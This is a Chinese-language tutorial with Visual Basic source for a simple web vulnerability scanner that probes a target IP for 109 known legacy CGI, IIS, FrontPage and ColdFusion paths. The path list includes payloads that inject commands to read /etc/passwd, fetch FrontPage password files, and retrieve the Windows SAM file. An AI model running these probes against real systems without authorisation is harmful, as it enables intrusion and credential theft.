如何用VB编写脚本漏洞扫描器
首先创建6个TEXTBOX,2个CommandBUTTEN,1个ProgressBar,1个INET
然后写如代码
Dim ch(109)
Dim a
Dim w
Private Sub Command1_Click()
On Error Resume Next
w = 0
a = 1
Dim ip As String
Dim bg(109) As String
Dim ff
n = 0
ip = Text1.Text
bg(1) = "/cgi-bin/formmail.pl"
bg(2) = "/cgi-bin/printenv"
bg(3) = "/cgi-bin/test-cgi"
bg(4) = "/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd"
bg(5) = "/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd"
bg(6) = "/cgi-bin/rwwwshell.pl"
bg(7) = "/cgi-bin/phf"
bg(8) = "/cgi-bin/Count.cgi"
bg(9) = "/cgi-bin/test.cgi"
bg(10) = "/cgi-bin/nph-test-cgi"
bg(11) = "/cgi-bin/nph-publish"
bg(12) = "/cgi-bin/php.cgi"
bg(13) = "/cgi-bin/handler"
bg(14) = "/cgi-bin/webgais"
bg(15) = "/cgi-bin/websendmail"
bg(16) = "/cgi-bin/webdist.cgi"
bg(17) = "/cgi-bin/faxsurvey"
bg(18) = "/cgi-bin/htmlscript"
bg(19) = "/cgi-bin/pfdisplay.cgi"
bg(20) = "/cgi-bin/perl.exe"
bg(21) = "/cgi-bin/wwwboard.pl"
bg(22) = "/cgi-bin/www-sql"
bg(23) = "/cgi-bin/view-source"
bg(24) = "/cgi-bin/campas"
bg(25) = "/cgi-bin/aglimpse"
bg(26) = "/cgi-bin/glimpse"
bg(27) = "/cgi-bin/man.sh"
bg(28) = "/cgi-bin/AT-admin.cgi"
bg(29) = "/scripts/no-such-file.pl"
bg(30) = "/_vti_bin/shtml.dll"
bg(31) = "/_vti_inf.html"
bg(32) = "/_vti_pvt/administrators.pwd"
bg(33) = "/_vti_pvt/users.pwd"
bg(34) = "/msadc/Samples/SelectOR/showcode.asp"
bg(35) = "/scripts/iisadmin/ism.dll?http/dir"
bg(36) = "/adsamples/config/site.csc"
bg(37) = "/main.asp%81"
bg(38) = "/AdvWorks/equipment/catalog_type.asp?"
bg(39) = "/index.asp::$DATA"
bg(40) = "/cgi-bin/visadmin.exe?user=guest"
bg(41) = "/?PageServices"
bg(42) = "/ss.cfg"
bg(43) = "/cgi-bin/cachemgr.cgi"
bg(44) = "/domcfg.nsf /today.nsf"
bg(45) = "/names.nsf"
bg(46) = "/catalog.nsf"
bg(47) = "/log.nsf"
bg(48) = "/domlog.nsf"
bg(49) = "/cgi-bin/AT-generate.cgi"
bg(50) = "/secure/.wwwacl"
bg(51) = "/secure/.htaccess"
bg(52) = "/samples/search/webhits.exe"
bg(53) = "/scripts/srchadm/admin.idq"
bg(54) = "/cgi-bin/dumpenv.pl"
bg(55) = "/adminlogin?RCpage=/sysadmin/index.stm /c:/program"
bg(56) = "/ncl_items.html?SUBJECT=2097 /cgi-bin/filemail.pl /cgi-bin/maillist.pl /cgi-bin/jj"
bg(57) = "/getdrvrs.exe"
bg(58) = "/test/test.cgi"
bg(59) = "/scripts/submit.cgi"
bg(60) = "/users/scripts/submit.cgi"
bg(61) = "/cgi-bin/info2www"
bg(62) = "/cgi-bin/files.pl"
bg(63) = "/cgi-bin/finger"
bg(64) = "/cgi-bin/bnbform.cgi"
bg(65) = "/cgi-bin/survey.cgi"
bg(66) = "/cgi-bin/AnyForm2"
bg(67) = "/cgi-bin/textcounter.pl"
bg(68) = "/cgi-bin/classifieds.cgi"
bg(69) = "/cgi-bin/environ.cgi"
bg(70) = "/cgi-bin/wrap"
bg(71) = "/cgi-bin/cgiwrap"
bg(72) = "/cgi-bin/guestbook.cgi"
bg(73) = "/cgi-bin/edit.pl"
bg(74) = "/cgi-bin/perlshop.cgi"
bg(75) = "/_vti_inf.html"
bg(76) = "/_vti_pvt/service.pwd"
bg(77) = "/_vti_pvt/users.pwd"
bg(78) = "/_vti_pvt/authors.pwd"
bg(79) = "/_vti_pvt/administrators.pwd"
bg(80) = "/cgi-win/uploader.exe"
bg(81) = "/iisadmpwd/achg.htr"
bg(82) = "/iisadmpwd/aexp.htr"
bg(83) = "/iisadmpwd/aexp2.htr"
bg(84) = "/cfdocs/expeval/openfile.cfm"
bg(85) = "/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:WINNTrepairsam._"
bg(86) = "/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:WINNTrepairsam._"
bg(87) = "/CFIDE/Administrator/startstop.html"
bg(88) = "/cgi-bin/wwwboard.pl"
bg(89) = "/_vti_pvt/shtml.dll"
bg(90) = "/_vti_pvt/shtml.exe"
bg(91) = "/cgi-dos/args.bat"
bg(92) = "/cgi-win/uploader.exe"
bg(93) = "/cgi-bin/rguest.exe"
bg(94) = "/cgi-bin/wguest.exe"
bg(95) = "/scripts/issadmin/bdir.htr"
bg(96) = "/scripts/CGImail.exe"
bg(97) = "/scripts/tools/newdsn.exe"
bg(98) = "/scripts/fpcount.exe"
bg(99) = "/cfdocs/expelval/openfile.cfm"
bg(100) = "/cfdocs/expelval/exprcalc.cfm"
bg(101) = "/cfdocs/expelval/displayopenedfile.cfm"
bg(102) = "/cfdocs/expelval/sendmail.cfm"
bg(103) = "/iissamples/exair/howitworks/codebrws.asp"
bg(104) = "/iissamples/sdk/asp/docs/codebrws.asp"
bg(105) = "/msads/Samples/SelectOR/showcode.asp"
bg(106) = "/search97.vts"
bg(107) = "/carbo.dll"
bg(108) = "/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd"
bg(109) = "/doc"
Txtinfo.Text = ""
Txtinfo.Text = "扫描器正在准备..."
Dim h, h2
Inet1.Cancel
Inet1.URL = ""
Inet1.OpenURL "http://" & ip, 1
h = Inet1.GetHeader("server")
Text2.Text = h
Txtinfo.Text = Txtinfo.Text + vbCrLf & vbCrLf & "正在扫描 [" & ip & "]" & vbCrLf & vbCrLf
For i = 1 To 109
h = ""
Inet1.URL = ""
Inet1.OpenURL ip & bg(i), 1
Text4.Text = i
ProgressBar1 = ProgressBar1 + 1
h = Inet1.GetHeader
h2 = Split(h, vbCrLf)
If h2(0) = "HTTP/1.1 200 OK" Then
Txtinfo.Text = Txtinfo.Text + "发现漏洞! "
n = n + 1
ch(n) = Inet1.URL & vbCrLf & vbCrLf
w = w + 1
Text3.Text = w
End If
Next i
Txtinfo.Text = Txtinfo.Text + "扫描完成" & vbCrLf & vbCrLf
Text5.Text = ch(1)
End Sub
Private Sub Command2_Click()
End
End Sub
Private Sub Command3_Click()
If a <= 1 Then MsgBox "到顶了!", , "错误"
If a <= 1 Then GoTo 10
a = a - 1
Text5.Text = ch(a)
10 End Sub
Private Sub Command4_Click()
If a >= w Then MsgBox "到底了!", , "错误"
If a >= w Then GoTo 10
a = a + 1
Text5.Text = ch(a)
10 End Sub
Private Sub Form_Load()
ProgressBar1 = 109
End SUB
这个程序可以扫描109个漏洞,比较实用。
补充:软件开发 , Vb ,